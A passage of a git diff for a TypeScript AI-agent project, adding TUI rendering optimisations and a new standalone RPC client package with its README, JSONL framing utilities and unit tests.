+		const dims = { widthPx: 100, heightPx: 200 };
+		const img = new Image("base64data", "image/png", theme, {}, dims);
+		const result = img.getDimensions();
+		assert.deepEqual(result, dims, "Should return provided dimensions");
+	});
+
+	test("onDimensionsResolved callback is not called when dimensions provided", () => {
+		let callCount = 0;
+		const dims = { widthPx: 100, heightPx: 200 };
+		const img = new Image("base64data", "image/png", theme, {}, dims);
+		img.setOnDimensionsResolved(() => { callCount++; });
+		// With pre-resolved dims, the async path is skipped entirely
+		assert.equal(callCount, 0, "Callback should not fire for pre-resolved dimensions");
+	});
+});
diff --git a/packages/pi-tui/src/components/image.ts b/packages/pi-tui/src/components/image.ts
index c789a0a5b..814167605 100644
--- a/packages/pi-tui/src/components/image.ts
+++ b/packages/pi-tui/src/components/image.ts
@@ -72,6 +72,11 @@ export class Image implements Component {
 		return this.imageId;
 	}
 
+	/** Get the resolved image dimensions (for caching across recreations). */
+	getDimensions(): ImageDimensions | undefined {
+		return this.dimensionsResolved ? this.dimensions : undefined;
+	}
+
 	invalidate(): void {
 		this.cachedLines = undefined;
 		this.cachedWidth = undefined;
diff --git a/packages/pi-tui/src/components/loader.ts b/packages/pi-tui/src/components/loader.ts
index a55a2570c..5115f8337 100644
--- a/packages/pi-tui/src/components/loader.ts
+++ b/packages/pi-tui/src/components/loader.ts
@@ -2,13 +2,16 @@ import type { TUI } from "../tui.js";
 import { Text } from "./text.js";
 
 /**
- * Loader component that updates every 80ms with spinning animation
+ * Loader component that updates every 80ms with spinning animation.
+ * Frame rotation is isolated from message text to avoid invalidating
+ * Text's render cache (wrapTextWithAnsi, visibleWidth) on every tick.
  */
 export class Loader extends Text {
 	private frames = ["⠋", "⠙", "⠹", "⠸", "⠼", "⠴", "⠦", "⠧", "⠇", "⠏"];
 	private currentFrame = 0;
 	private intervalId: NodeJS.Timeout | null = null;
 	private ui: TUI | null = null;
+	private _lastMessage: string = "";
 
 	constructor(
 		ui: TUI,
@@ -22,18 +25,38 @@ export class Loader extends Text {
 	}
 
 	render(width: number): string[] {
-		return ["", ...super.render(width)];
+		// Only update Text content when message actually changes —
+		// frame rotation is prepended below without touching the cache
+		if (this.message !== this._lastMessage) {
+			this.setText(this.messageColorFn(this.message));
+			this._lastMessage = this.message;
+		}
+		const messageLines = super.render(width);
+		// Shallow copy so we don't mutate cachedLines from Text
+		const result = ["", ...messageLines];
+		// Prepend spinner frame to first content line
+		if (result.length > 1) {
+			const frame = this.frames[this.currentFrame];
+			result[1] = this.spinnerColorFn(frame) + " " + result[1];
+		}
+		return result;
 	}
 
 	start() {
 		if (this.intervalId) {
 			clearInterval(this.intervalId);
 		}
-		this.updateDisplay();
+		this.currentFrame = 0;
 		this.intervalId = setInterval(() => {
 			this.currentFrame = (this.currentFrame + 1) % this.frames.length;
-			this.updateDisplay();
+			if (this.ui) {
+				this.ui.requestRender();
+			}
 		}, 80);
+		// Trigger initial render
+		if (this.ui) {
+			this.ui.requestRender();
+		}
 	}
 
 	stop() {
@@ -50,12 +73,6 @@ export class Loader extends Text {
 
 	setMessage(message: string) {
 		this.message = message;
-		this.updateDisplay();
-	}
-
-	private updateDisplay() {
-		const frame = this.frames[this.currentFrame];
-		this.setText(`${this.spinnerColorFn(frame)} ${this.messageColorFn(this.message)}`);
 		if (this.ui) {
 			this.ui.requestRender();
 		}
diff --git a/packages/pi-tui/src/components/text.ts b/packages/pi-tui/src/components/text.ts
index efcf25b45..a9519bfdf 100644
--- a/packages/pi-tui/src/components/text.ts
+++ b/packages/pi-tui/src/components/text.ts
@@ -23,6 +23,7 @@ export class Text implements Component {
 	}
 
 	setText(text: string): void {
+		if (this.text === text) return;
 		this.text = text;
 		this.cachedText = undefined;
 		this.cachedWidth = undefined;
diff --git a/packages/pi-tui/src/overlay-layout.ts b/packages/pi-tui/src/overlay-layout.ts
index 1896c5bba..5e306ec91 100644
--- a/packages/pi-tui/src/overlay-layout.ts
+++ b/packages/pi-tui/src/overlay-layout.ts
@@ -6,7 +6,7 @@
  */
 
 import type { OverlayAnchor, OverlayOptions, SizeValue } from "./tui.js";
-import { extractSegments, sliceByColumn, sliceWithWidth, truncateToWidth, visibleWidth } from "./utils.js";
+import { applyBackgroundToLine, extractSegments, sliceByColumn, sliceWithWidth, truncateToWidth, visibleWidth } from "./utils.js";
 import { isImageLine } from "./terminal-image.js";
 import { CURSOR_MARKER } from "./tui.js";
 
@@ -324,6 +324,18 @@ export function compositeOverlays(
 
 	const viewportStart = Math.max(0, workingHeight - termHeight);
 
+	// Apply backdrop dimming if any visible overlay requests it.
+	// Uses dim + gray foreground so text fades without painting empty lines.
+	const hasBackdrop = visibleEntries.some((e) => e.options?.backdrop);
+	if (hasBackdrop) {
+		const dimFn = (text: string) => `\x1b[2m\x1b[38;5;240m${text}\x1b[39m\x1b[22m`;
+		for (let i = viewportStart; i < result.length; i++) {
+			if (!isImageLine(result[i]) && result[i].length > 0) {
+				result[i] = applyBackgroundToLine(result[i], termWidth, dimFn);
+			}
+		}
+	}
+
 	// Composite each overlay
 	for (const { overlayLines, row, col, w } of rendered) {
 		for (let i = 0; i < overlayLines.length; i++) {
diff --git a/packages/pi-tui/src/stdin-buffer.ts b/packages/pi-tui/src/stdin-buffer.ts
index 5b2f977b0..ea2baec91 100644
--- a/packages/pi-tui/src/stdin-buffer.ts
+++ b/packages/pi-tui/src/stdin-buffer.ts
@@ -361,6 +361,13 @@ export class StdinBuffer extends EventEmitter<StdinBufferEventMap> {
 			return [];
 		}
 
+		// Keep incomplete escape prefixes buffered so split CSI/mouse/focus
+		// sequences do not get emitted as literal text on timeout.
+		// A lone ESC is still flushed so an actual Escape keypress is not lost.
+		if (this.buffer.length > 1 && this.buffer.startsWith(ESC) && isCompleteSequence(this.buffer) === "incomplete") {
+			return [];
+		}
+
 		const sequences = [this.buffer];
 		this.buffer = "";
 		return sequences;
diff --git a/packages/pi-tui/src/terminal.ts b/packages/pi-tui/src/terminal.ts
index 52bb27ad3..ff84a6283 100644
--- a/packages/pi-tui/src/terminal.ts
+++ b/packages/pi-tui/src/terminal.ts
@@ -9,6 +9,9 @@ const cjsRequire = createRequire(import.meta.url);
  * Minimal terminal interface for TUI
  */
 export interface Terminal {
+	// Whether stdout is a real TTY (false for pipes, e.g. RPC bridge processes)
+	readonly isTTY: boolean;
+
 	// Start the terminal with input and resize handlers
 	start(onInput: (data: string) => void, onResize: () => void): void;
 
@@ -63,11 +66,22 @@ export class ProcessTerminal implements Terminal {
 	private stdinDataHandler?: (data: string) => void;
 	private writeLogPath = process.env.PI_TUI_WRITE_LOG || "";
 
+	get isTTY(): boolean {
+		return !!process.stdout.isTTY;
+	}
+
 	get kittyProtocolActive(): boolean {
 		return this._kittyProtocolActive;
 	}
 
 	start(onInput: (data: string) => void, onResize: () => void): void {
+		// Non-TTY stdout (pipe) — skip TUI initialization entirely.
+		// RPC bridge processes communicate via JSON, not terminal escape codes.
+		// Without this guard, the render loop burns 500%+ CPU. (issue #3095)
+		if (!this.isTTY) {
+			return;
+		}
+
 		this.inputHandler = onInput;
 		this.resizeHandler = onResize;
 
diff --git a/packages/pi-tui/src/tui.ts b/packages/pi-tui/src/tui.ts
index d0154b0ce..7c58c0145 100644
--- a/packages/pi-tui/src/tui.ts
+++ b/packages/pi-tui/src/tui.ts
@@ -141,6 +141,8 @@ export interface OverlayOptions {
 	visible?: (termWidth: number, termHeight: number) => boolean;
 	/** If true, don't capture keyboard focus when shown */
 	nonCapturing?: boolean;
+	/** If true, dim the background behind the overlay */
+	backdrop?: boolean;
 }
 
 /**
@@ -166,20 +168,33 @@ export interface OverlayHandle {
  */
 export class Container implements Component {
 	children: Component[] = [];
+	private _prevRender: string[] | null = null;
 
 	addChild(component: Component): void {
 		this.children.push(component);
+		this._prevRender = null;
 	}
 
 	removeChild(component: Component): void {
 		const index = this.children.indexOf(component);
 		if (index !== -1) {
+			const child = this.children[index];
 			this.children.splice(index, 1);
+			if ('dispose' in child && typeof (child as any).dispose === 'function') {
+				(child as any).dispose();
+			}
+			this._prevRender = null;
 		}
 	}
 
 	clear(): void {
+		for (const child of this.children) {
+			if ('dispose' in child && typeof (child as any).dispose === 'function') {
+				(child as any).dispose();
+			}
+		}
 		this.children = [];
+		this._prevRender = null;
 	}
 
 	invalidate(): void {
@@ -194,6 +209,17 @@ export class Container implements Component {
 			const rendered = child.render(width);
 			for (let i = 0; i < rendered.length; i++) lines.push(rendered[i]);
 		}
+		// Return stable reference if output unchanged — allows doRender()
+		// to skip ALL post-processing (isImageLine, applyLineResets, diffs)
+		const prev = this._prevRender;
+		if (prev && prev.length === lines.length) {
+			let same = true;
+			for (let i = 0; i < lines.length; i++) {
+				if (lines[i] !== prev[i]) { same = false; break; }
+			}
+			if (same) return prev;
+		}
+		this._prevRender = lines;
 		return lines;
 	}
 }
@@ -222,6 +248,7 @@ export class TUI extends Container {
 	private previousViewportTop = 0; // Track previous viewport top for resize-aware cursor moves
 	private fullRedrawCount = 0;
 	private stopped = false;
+	private _lastRenderedComponents: string[] | null = null;
 
 	// Overlay stack for modal components rendered on top of base content
 	private focusOrderCounter = 0;
@@ -399,6 +426,12 @@ export class TUI extends Container {
 
 	start(): void {
 		this.stopped = false;
+		// Non-TTY stdout (pipe) — skip TUI entirely to avoid burning CPU.
+		// RPC bridge processes have piped stdio; rendering ANSI escape codes
+		// to a pipe is pure waste and causes a runaway render loop. (issue #3095)
+		if (!this.terminal.isTTY) {
+			return;
+		}
 		this.terminal.start(
 			(data) => this.handleInput(data),
 			() => this.requestRender(),
@@ -458,6 +491,8 @@ export class TUI extends Container {
 	}
 
 	requestRender(force = false): void {
+		// Skip rendering on non-TTY stdout to prevent CPU burn (issue #3095)
+		if (!this.terminal.isTTY) return;
 		if (force) {
 			this.previousLines = [];
 			this.previousWidth = -1; // -1 triggers widthChanged, forcing a full clear
@@ -555,6 +590,15 @@ export class TUI extends Container {
 			this.cellSizeQueryPending = false;
 		}
 
+		// Don't hold a bare Escape keypress hostage while waiting for the
+		// optional cell-size response. This is the most common early input race.
+		if (this.inputBuffer === "\x1b") {
+			const result = this.inputBuffer;
+			this.inputBuffer = "";
+			this.cellSizeQueryPending = false;
+			return result;
+		}
+
 		// Check if we have a partial cell size response starting (wait for more data)
 		// Patterns that could be incomplete cell size response: \x1b, \x1b[, \x1b[6, \x1b[6;...(no t yet)
 		const partialCellSizePattern = /\x1b(\[6?;?[\d;]*)?$/;
@@ -591,6 +635,13 @@ export class TUI extends Container {
 		// Render all components to get new lines
 		let newLines = this.render(width);
 
+		// Skip ALL post-processing if component output is unchanged.
+		// Container.render() returns the same array reference when stable.
+		if (newLines === this._lastRenderedComponents && this.overlayStack.length === 0) {
+			return;
+		}
+		this._lastRenderedComponents = newLines;
+
 		// Composite overlays into the rendered lines (before differential compare)
 		if (this.overlayStack.length > 0) {
 			newLines = compositeOverlays(newLines, this.overlayStack, width, height, this.maxLinesRendered);
diff --git a/packages/rpc-client/.npmignore b/packages/rpc-client/.npmignore
new file mode 100644
index 000000000..5aedf8f6e
--- /dev/null
+++ b/packages/rpc-client/.npmignore
@@ -0,0 +1 @@
+dist/*.test.*
diff --git a/packages/rpc-client/README.md b/packages/rpc-client/README.md
new file mode 100644
index 000000000..6dcad70e6
--- /dev/null
+++ b/packages/rpc-client/README.md
@@ -0,0 +1,125 @@
+# @gsd-build/rpc-client
+
+Standalone RPC client SDK for GSD. Spawn the agent process, perform a v2 protocol handshake, send commands, and consume typed events via an async generator — all in a few lines of TypeScript.
+
+Zero internal dependencies. Ships its own inlined types.
+
+## Installation
+
+```bash
+npm install @gsd-build/rpc-client
+```
+
+## Quick Start
+
+```typescript
+import { RpcClient } from '@gsd-build/rpc-client';
+
+const client = new RpcClient({ cwd: process.cwd() });
+await client.start();
+const { sessionId } = await client.init({ clientId: 'my-app' });
+console.log(`Session: ${sessionId}`);
+
+await client.prompt('Create a hello world script');
+for await (const event of client.events()) {
+  if (event.type === 'execution_complete') break;
+  console.log(event.type);
+}
+await client.shutdown();
+```
+
+## API
+
+### Constructor
+
+```typescript
+const client = new RpcClient(options?: RpcClientOptions);
+```
+
+| Option     | Type                     | Description                              |
+|------------|--------------------------|------------------------------------------|
+| `cliPath`  | `string`                 | Path to the CLI entry point              |
+| `cwd`      | `string`                 | Working directory for the agent          |
+| `env`      | `Record<string, string>` | Environment variables                    |
+| `provider` | `string`                 | AI provider (e.g. `"anthropic"`)         |
+| `model`    | `string`                 | Model ID (e.g. `"claude-sonnet"`)        |
+| `args`     | `string[]`               | Additional CLI arguments                 |
+
+### Lifecycle
+
+| Method        | Description                                    |
+|---------------|------------------------------------------------|
+| `start()`     | Spawn the agent process                        |
+| `init(opts?)` | v2 handshake — returns `sessionId`, capabilities |
+| `shutdown()`  | Graceful shutdown                              |
+| `stop()`      | Force-kill the process                         |
+
+### Commands
+
+| Method                         | Description                            |
+|--------------------------------|----------------------------------------|
+| `prompt(message, images?)`     | Send a prompt                          |
+| `steer(message, images?)`      | Interrupt with a steering message      |
+| `followUp(message, images?)`   | Queue a follow-up message              |
+| `abort()`                      | Abort current operation                |
+| `subscribe(events)`            | Subscribe to event types (`["*"]` for all) |
+
+### Events
+
+```typescript
+// Async generator — recommended
+for await (const event of client.events()) {
+  console.log(event.type);
+}
+
+// Callback-based
+const unsubscribe = client.onEvent((event) => {
+  console.log(event.type);
+});
+```
+
+### Helpers
+
+| Method                                | Description                              |
+|---------------------------------------|------------------------------------------|
+| `waitForIdle(timeout?)`               | Wait for `agent_end` event               |
+| `collectEvents(timeout?)`             | Collect events until idle                |
+| `promptAndWait(message, images?, t?)` | Send prompt and collect events           |
+
+### Session & Model
+
+| Method                           | Description                       |
+|----------------------------------|-----------------------------------|
+| `getState()`                     | Get session state                 |
+| `setModel(provider, modelId)`    | Set model                         |
+| `cycleModel()`                   | Cycle to next model               |
+| `getAvailableModels()`           | List available models             |
+| `setThinkingLevel(level)`        | Set thinking level                |
+| `cycleThinkingLevel()`           | Cycle thinking level              |
+| `compact(instructions?)`         | Compact session context           |
+| `getSessionStats()`              | Get session statistics            |
+| `bash(command)`                  | Execute a bash command            |
+| `newSession(parent?)`            | Start a new session               |
+| `sendUIResponse(id, response)`   | Respond to extension UI requests  |
+
+## Type Exports
+
+All protocol types are exported from the package root:
+
+```typescript
+import type {
+  RpcCommand,
+  RpcResponse,
+  RpcInitResult,
+  RpcExecutionCompleteEvent,
+  RpcCostUpdateEvent,
+  RpcV2Event,
+  SessionStats,
+  SdkAgentEvent,
+  RpcClientOptions,
+} from '@gsd-build/rpc-client';
+```
+
+## License
+
+MIT
diff --git a/packages/rpc-client/examples/basic-usage.ts b/packages/rpc-client/examples/basic-usage.ts
new file mode 100644
index 000000000..3248799b4
--- /dev/null
+++ b/packages/rpc-client/examples/basic-usage.ts
@@ -0,0 +1,13 @@
+import { RpcClient } from '@gsd-build/rpc-client';
+
+const client = new RpcClient({ cwd: process.cwd() });
+await client.start();
+const { sessionId } = await client.init({ clientId: 'my-app' });
+console.log(`Session: ${sessionId}`);
+
+await client.prompt('Create a hello world script');
+for await (const event of client.events()) {
+  if (event.type === 'execution_complete') break;
+  console.log(event.type);
+}
+await client.shutdown();
diff --git a/packages/rpc-client/package.json b/packages/rpc-client/package.json
new file mode 100644
index 000000000..934be48ab
--- /dev/null
+++ b/packages/rpc-client/package.json
@@ -0,0 +1,34 @@
+{
+  "name": "@gsd-build/rpc-client",
+  "version": "2.52.0",
+  "description": "Standalone RPC client SDK for GSD — zero internal dependencies",
+  "license": "MIT",
+  "repository": {
+    "type": "git",
+    "url": "https://github.com/gsd-build/gsd-2.git",
+    "directory": "packages/rpc-client"
+  },
+  "publishConfig": {
+    "access": "public"
+  },
+  "type": "module",
+  "main": "./dist/index.js",
+  "types": "./dist/index.d.ts",
+  "exports": {
+    ".": {
+      "types": "./dist/index.d.ts",
+      "import": "./dist/index.js"
+    }
+  },
+  "files": [
+    "dist",
+    "!dist/**/*.test.*"
+  ],
+  "scripts": {
+    "build": "tsc -p tsconfig.json",
+    "test": "node --test dist/rpc-client.test.js"
+  },
+  "engines": {
+    "node": ">=22.0.0"
+  }
+}
diff --git a/packages/rpc-client/src/index.ts b/packages/rpc-client/src/index.ts
new file mode 100644
index 000000000..3771a3359
--- /dev/null
+++ b/packages/rpc-client/src/index.ts
@@ -0,0 +1,10 @@
+/**
+ * @gsd-build/rpc-client — standalone RPC client SDK for GSD.
+ *
+ * Re-exports all types, JSONL utilities, and the RpcClient class.
+ */
+
+export * from "./rpc-types.js";
+export { serializeJsonLine, attachJsonlLineReader } from "./jsonl.js";
+export { RpcClient } from "./rpc-client.js";
+export type { RpcClientOptions, RpcEventListener, SdkAgentEvent } from "./rpc-client.js";
diff --git a/packages/rpc-client/src/jsonl.ts b/packages/rpc-client/src/jsonl.ts
new file mode 100644
index 000000000..5392defef
--- /dev/null
+++ b/packages/rpc-client/src/jsonl.ts
@@ -0,0 +1,64 @@
+import type { Readable } from "node:stream";
+import { StringDecoder } from "node:string_decoder";
+
+/**
+ * Serialize a single strict JSONL record.
+ *
+ * Framing is LF-only. Payload strings may contain other Unicode separators such as
+ * U+2028 and U+2029. Clients must split records on `\n` only.
+ */
+export function serializeJsonLine(value: unknown): string {
+	return `${JSON.stringify(value)}\n`;
+}
+
+/**
+ * Attach an LF-only JSONL reader to a stream.
+ *
+ * This intentionally does not use Node readline. Readline splits on additional
+ * Unicode separators that are valid inside JSON strings and therefore does not
+ * implement strict JSONL framing.
+ */
+export function attachJsonlLineReader(stream: Readable, onLine: (line: string) => void): () => void {
+	const decoder = new StringDecoder("utf8");
+	let buffer = "";
+
+	const emitLine = (line: string) => {
+		onLine(line.endsWith("\r") ? line.slice(0, -1) : line);
+	};
+
+	const onData = (chunk: string | Buffer) => {
+		buffer += typeof chunk === "string" ? chunk : decoder.write(chunk);
+
+		while (true) {
+			const newlineIndex = buffer.indexOf("\n");
+			if (newlineIndex === -1) {
+				return;
+			}
+
+			emitLine(buffer.slice(0, newlineIndex));
+			buffer = buffer.slice(newlineIndex + 1);
+		}
+	};
+
+	const onEnd = () => {
+		buffer += decoder.end();
+		if (buffer.length > 0) {
+			emitLine(buffer);
+			buffer = "";
+		}
+	};
+
+	const onError = (_err: Error) => {
+		// Stream errors are non-fatal for JSONL reading
+	};
+
+	stream.on("data", onData);
+	stream.on("end", onEnd);
+	stream.on("error", onError);
+
+	return () => {
+		stream.off("data", onData);
+		stream.off("end", onEnd);
+		stream.off("error", onError);
+	};
+}
diff --git a/packages/rpc-client/src/rpc-client.test.ts b/packages/rpc-client/src/rpc-client.test.ts
new file mode 100644
index 000000000..9fcb7874f
--- /dev/null
+++ b/packages/rpc-client/src/rpc-client.test.ts
@@ -0,0 +1,568 @@
+import { describe, it, beforeEach, afterEach } from "node:test";
+import assert from "node:assert/strict";
+import { PassThrough } from "node:stream";
+import { serializeJsonLine, attachJsonlLineReader } from "./jsonl.js";
+import type {
+	RpcInitResult,
+	RpcExecutionCompleteEvent,
+	RpcCostUpdateEvent,
+	RpcProtocolVersion,
+	SessionStats,
+	RpcV2Event,
+} from "./rpc-types.js";
+import { RpcClient } from "./rpc-client.js";
+import type { SdkAgentEvent } from "./rpc-client.js";
+
+// ============================================================================
+// JSONL Tests
+// ============================================================================
+
+describe("serializeJsonLine", () => {
+	it("produces valid JSON terminated with LF", () => {
+		const result = serializeJsonLine({ type: "test", value: 42 });
+		assert.ok(result.endsWith("\n"), "must end with LF");
+		const parsed = JSON.parse(result.trim());
+		assert.equal(parsed.type, "test");
+		assert.equal(parsed.value, 42);
+	});
+
+	it("serializes strings with special characters", () => {
+		const result = serializeJsonLine({ msg: "hello\nworld" });
+		assert.ok(result.endsWith("\n"));
+		// The embedded \n must be escaped inside the JSON — only the trailing LF is the framing delimiter
+		const lines = result.split("\n");
+		// Should be exactly 2 parts: the JSON line and the empty string after trailing LF
+		assert.equal(lines.length, 2);
+		assert.equal(lines[1], "");
+		const parsed = JSON.parse(lines[0]);
+		assert.equal(parsed.msg, "hello\nworld");
+	});
+
+	it("handles empty objects", () => {
+		const result = serializeJsonLine({});
+		assert.equal(result, "{}\n");
+	});
+});
+
+describe("attachJsonlLineReader", () => {
+	it("splits on LF correctly", async () => {
+		const stream = new PassThrough();
+		const lines: string[] = [];
+
+		attachJsonlLineReader(stream, (line) => lines.push(line));
+
+		stream.write('{"a":1}\n{"b":2}\n');
+		stream.end();
+
+		// Let microtask queue flush
+		await new Promise((r) => setTimeout(r, 10));
+
+		assert.equal(lines.length, 2);
+		assert.equal(JSON.parse(lines[0]).a, 1);
+		assert.equal(JSON.parse(lines[1]).b, 2);
+	});
+
+	it("handles chunked data across boundaries", async () => {
+		const stream = new PassThrough();
+		const lines: string[] = [];
+
+		attachJsonlLineReader(stream, (line) => lines.push(line));
+
+		// Write in fragments that split mid-line
+		stream.write('{"type":"hel');
+		stream.write('lo"}\n{"type":"w');
+		stream.write('orld"}\n');
+		stream.end();
+
+		await new Promise((r) => setTimeout(r, 10));
+
+		assert.equal(lines.length, 2);
+		assert.equal(JSON.parse(lines[0]).type, "hello");
+		assert.equal(JSON.parse(lines[1]).type, "world");
+	});
+
+	it("emits trailing data on stream end", async () => {
+		const stream = new PassThrough();
+		const lines: string[] = [];
+
+		attachJsonlLineReader(stream, (line) => lines.push(line));
+
+		stream.write('{"final":true}');
+		stream.end();
+
+		await new Promise((r) => setTimeout(r, 10));
+
+		assert.equal(lines.length, 1);
+		assert.equal(JSON.parse(lines[0]).final, true);
+	});
+
+	it("returns a detach function that stops reading", async () => {
+		const stream = new PassThrough();
+		const lines: string[] = [];
+
+		const detach = attachJsonlLineReader(stream, (line) => lines.push(line));
+
+		stream.write('{"a":1}\n');
+		await new Promise((r) => setTimeout(r, 10));
+		assert.equal(lines.length, 1);
+
+		detach();
+
+		stream.write('{"b":2}\n');
+		stream.end();
+		await new Promise((r) => setTimeout(r, 10));
+
+		// Should still be 1 — detach removed listeners
+		assert.equal(lines.length, 1);
+	});
+
+	it("strips CR from CRLF line endings", async () => {
+		const stream = new PassThrough();
+		const lines: string[] = [];
+
+		attachJsonlLineReader(stream, (line) => lines.push(line));
+
+		stream.write('{"v":1}\r\n');
+		stream.end();
+
+		await new Promise((r) => setTimeout(r, 10));
+
+		assert.equal(lines.length, 1);
+		assert.equal(JSON.parse(lines[0]).v, 1);
+	});
+});
+
+// ============================================================================
+// Type Shape Tests
+// ============================================================================
+
+describe("type shapes", () => {
+	it("RpcInitResult has protocolVersion, sessionId, capabilities", () => {
+		const init: RpcInitResult = {
+			protocolVersion: 2,
+			sessionId: "sess_123",
+			capabilities: {
+				events: ["execution_complete", "cost_update"],
+				commands: ["prompt", "steer"],
+			},
+		};
+		assert.equal(init.protocolVersion, 2);
+		assert.equal(init.sessionId, "sess_123");
+		assert.ok(Array.isArray(init.capabilities.events));
+		assert.ok(Array.isArray(init.capabilities.commands));
+	});
+
+	it("RpcExecutionCompleteEvent has required fields", () => {
+		const event: RpcExecutionCompleteEvent = {
+			type: "execution_complete",
+			runId: "run_abc",
+			status: "completed",
+			stats: {
+				sessionFile: "/tmp/session.json",
+				sessionId: "sess_123",
+				userMessages: 5,
+				assistantMessages: 5,
+				toolCalls: 3,
+				toolResults: 3,
+				totalMessages: 10,
+				tokens: { input: 1000, output: 500, cacheRead: 200, cacheWrite: 100, total: 1800 },
+				cost: 0.05,
+			},
+		};
+		assert.equal(event.type, "execution_complete");
+		assert.equal(event.runId, "run_abc");
+		assert.equal(event.status, "completed");
+		assert.ok(event.stats);
+		assert.equal(event.stats.sessionId, "sess_123");
+	});
+
+	it("RpcCostUpdateEvent has required fields", () => {
+		const event: RpcCostUpdateEvent = {
+			type: "cost_update",
+			runId: "run_abc",
+			turnCost: 0.01,
+			cumulativeCost: 0.05,
+			tokens: { input: 500, output: 200, cacheRead: 100, cacheWrite: 50 },
+		};
+		assert.equal(event.type, "cost_update");
+		assert.equal(event.runId, "run_abc");
+		assert.equal(event.turnCost, 0.01);
+		assert.equal(event.cumulativeCost, 0.05);
+		assert.ok(event.tokens);
+	});
+
+	it("SessionStats has all expected fields", () => {
+		const stats: SessionStats = {
+			sessionFile: "/tmp/session.json",
+			sessionId: "s1",
+			userMessages: 10,
+			assistantMessages: 10,
+			toolCalls: 5,
+			toolResults: 5,
+			totalMessages: 20,
+			tokens: { input: 2000, output: 1000, cacheRead: 500, cacheWrite: 200, total: 3700 },
+			cost: 0.10,
+		};
+		assert.equal(stats.sessionId, "s1");
+		assert.equal(stats.userMessages, 10);
+		assert.equal(stats.tokens.total, 3700);
+		assert.equal(stats.cost, 0.10);
+	});
+
+	it("RpcProtocolVersion accepts 1 and 2", () => {
+		const v1: RpcProtocolVersion = 1;
+		const v2: RpcProtocolVersion = 2;
+		assert.equal(v1, 1);
+		assert.equal(v2, 2);
+	});
+
+	it("RpcV2Event discriminated union covers both event types", () => {
+		const events: RpcV2Event[] = [
+			{
+				type: "execution_complete",
+				runId: "r1",
+				status: "completed",
+				stats: {
+					sessionFile: undefined,
+					sessionId: "s1",
+					userMessages: 1,
+					assistantMessages: 1,
+					toolCalls: 0,
+					toolResults: 0,
+					totalMessages: 2,
+					tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0, total: 150 },
+					cost: 0.001,
+				},
+			},
+			{
+				type: "cost_update",
+				runId: "r1",
+				turnCost: 0.001,
+				cumulativeCost: 0.001,
+				tokens: { input: 100, output: 50, cacheRead: 0, cacheWrite: 0 },
+			},
+		];
+		assert.equal(events.length, 2);
+		assert.equal(events[0].type, "execution_complete");
+		assert.equal(events[1].type, "cost_update");
+	});
+});
+
+// ============================================================================
+// RpcClient Construction Tests
+// ============================================================================
+
+describe("RpcClient construction", () => {
+	it("creates with default options", () => {
+		const client = new RpcClient();
+		assert.ok(client);
+	});
+
+	it("creates with custom options", () => {
+		const client = new RpcClient({
+			cliPath: "/usr/local/bin/gsd",
+			cwd: "/tmp",
+			env: { NODE_ENV: "test" },
+			provider: "anthropic",
+			model: "claude-sonnet",
+			args: ["--verbose"],
+		});
+		assert.ok(client);
+	});
+});
+
+// ============================================================================
+// events() Generator Tests
+// ============================================================================
+
+describe("events() async generator", () => {
+	it("yields events from a mock stream in order", async () => {
+		const client = new RpcClient();
+
+		// Reach into the client to set up a mock process with a PassThrough stdout
+		const mockStdout = new PassThrough();
+		const mockStderr = new PassThrough();
+		const mockStdin = new PassThrough();
+
+		// Simulate a started process by setting internal state
+		// We use Object.assign to set private fields for testing
+		const clientAny = client as any;
+		clientAny.process = {
+			stdout: mockStdout,
+			stderr: mockStderr,
+			stdin: mockStdin,
+			exitCode: null,
+			kill: () => {},
+			on: (event: string, handler: (...args: any[]) => void) => {
+				if (event === "exit") {
+					// Store exit handler so we can trigger it
+					clientAny._testExitHandler = handler;
+				}
+			},
+			removeListener: () => {},
+		};
+
+		// Attach the JSONL reader like start() does
+		clientAny.stopReadingStdout = attachJsonlLineReader(mockStdout, (line: string) => {
+			clientAny.handleLine(line);
+		});
+
+		// Collect events from the generator
+		const received: SdkAgentEvent[] = [];
+		const genPromise = (async () => {
+			for await (const event of client.events()) {
+				received.push(event);
+				if (event.type === "done") break;
+			}
+		})();
+
+		// Simulate server sending events
+		await new Promise((r) => setTimeout(r, 20));
+		mockStdout.write(serializeJsonLine({ type: "agent_start", runId: "r1" }));
+		await new Promise((r) => setTimeout(r, 20));
+		mockStdout.write(serializeJsonLine({ type: "token", text: "hello" }));
+		await new Promise((r) => setTimeout(r, 20));
+		mockStdout.write(serializeJsonLine({ type: "done" }));
+
+		await genPromise;
+
+		assert.equal(received.length, 3);
+		assert.equal(received[0].type, "agent_start");
+		assert.equal(received[1].type, "token");
+		assert.equal(received[2].type, "done");
+	});
+
+	it("terminates when process exits", async () => {
+		const client = new RpcClient();
+		const mockStdout = new PassThrough();
+		const mockStderr = new PassThrough();
+		const mockStdin = new PassThrough();
+
+		const exitHandlers: Array<() => void> = [];
+		const clientAny = client as any;
+		clientAny.process = {
+			stdout: mockStdout,
+			stderr: mockStderr,
+			stdin: mockStdin,
+			exitCode: null,
+			kill: () => {},
+			on: (event: string, handler: () => void) => {
+				if (event === "exit") exitHandlers.push(handler);
+			},
+			removeListener: (event: string, handler: () => void) => {
+				const idx = exitHandlers.indexOf(handler);
+				if (idx !== -1) exitHandlers.splice(idx, 1);
+			},
+		};
+
+		clientAny.stopReadingStdout = attachJsonlLineReader(mockStdout, (line: string) => {
+			clientAny.handleLine(line);
+		});
+
+		const received: SdkAgentEvent[] = [];
+		const genPromise = (async () => {
+			for await (const event of client.events()) {
+				received.push(event);
+			}
+		})();
+
+		// Send one event, then simulate process exit
+		await new Promise((r) => setTimeout(r, 20));
+		mockStdout.write(serializeJsonLine({ type: "agent_start" }));
+		await new Promise((r) => setTimeout(r, 20));
+
+		// Fire exit handlers
+		for (const h of exitHandlers) h();
+
+		await genPromise;
+
+		assert.equal(received.length, 1);
+		assert.equal(received[0].type, "agent_start");
+	});
+
+	it("throws if client not started", async () => {
+		const client = new RpcClient();
+		await assert.rejects(async () => {
+			// eslint-disable-next-line @typescript-eslint/no-unused-vars
+			for await (const _event of client.events()) {
+				// should not reach
+			}
+		}, /Client not started/);
+	});
+});
+
+// ============================================================================
+// sendUIResponse Serialization Test
+// ============================================================================
+
+describe("sendUIResponse serialization", () => {
+	it("writes correct JSONL to stdin", () => {
+		const client = new RpcClient();
+		const chunks: string[] = [];
+		const mockStdin = {
+			write: (data: string) => {
+				chunks.push(data);
+				return true;
+			},
+		};
+
+		const clientAny = client as any;
+		clientAny.process = { stdin: mockStdin };
+
+		client.sendUIResponse("ui_1", { value: "hello" });
+
+		assert.equal(chunks.length, 1);
